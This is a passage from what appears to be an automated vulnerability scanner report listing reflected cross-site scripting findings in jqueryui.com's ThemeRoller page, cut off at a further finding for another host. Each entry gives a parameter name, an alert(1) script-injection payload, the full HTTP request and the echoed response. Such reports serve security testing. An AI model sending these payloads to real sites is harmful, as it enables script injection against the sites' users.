The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7d24"><script>alert(1)</script>07a8ade417c was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0ad7d24"><script>alert(1)</script>07a8ade417c&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0ad7d24"><script>alert(1)</script>07a8ade417c&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

1.164. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1682"><script>alert(1)</script>1e6b425896f was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222e1682"><script>alert(1)</script>1e6b425896f&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222e1682"><script>alert(1)</script>1e6b425896f&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

1.165. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d721"><script>alert(1)</script>46c3f0680d0 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff2d721"><script>alert(1)</script>46c3f0680d0&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff2d721"><script>alert(1)</script>46c3f0680d0&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

1.166. http://jqueryui.com/themeroller/ [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d5a2"><script>alert(1)</script>73ac7e461b1 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=4545453d5a2"><script>alert(1)</script>73ac7e461b1&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=4545453d5a2"><script>alert(1)</script>73ac7e461b1&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa
...[SNIP]...

1.167. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59120"><script>alert(1)</script>c2a036bcbaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?59120"><script>alert(1)</script>c2a036bcbaf=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&59120"><script>alert(1)</script>c2a036bcbaf=1" type="text/css" media="all" />
...[SNIP]...

1.168. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 205ab"><script>alert(1)</script>04fa8eb0f56 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px205ab"><script>alert(1)</script>04fa8eb0f56&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:27:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px205ab"><script>alert(1)</script>04fa8eb0f56&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.169. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e3dd"><script>alert(1)</script>da16dd977e3 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px5e3dd"><script>alert(1)</script>da16dd977e3&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:27:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px5e3dd"><script>alert(1)</script>da16dd977e3&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.170. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f715b"><script>alert(1)</script>7dca66d889b was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30f715b"><script>alert(1)</script>7dca66d889b&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30f715b"><script>alert(1)</script>7dca66d889b&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

1.171. http://jqueryui.com/themeroller/ [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf774"><script>alert(1)</script>55c550506ed was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30bf774"><script>alert(1)</script>55c550506ed&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30bf774"><script>alert(1)</script>55c550506ed&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.172. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3419"><script>alert(1)</script>8dc9eba3e21 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxa3419"><script>alert(1)</script>8dc9eba3e21&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:27:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxa3419"><script>alert(1)</script>8dc9eba3e21&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.173. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

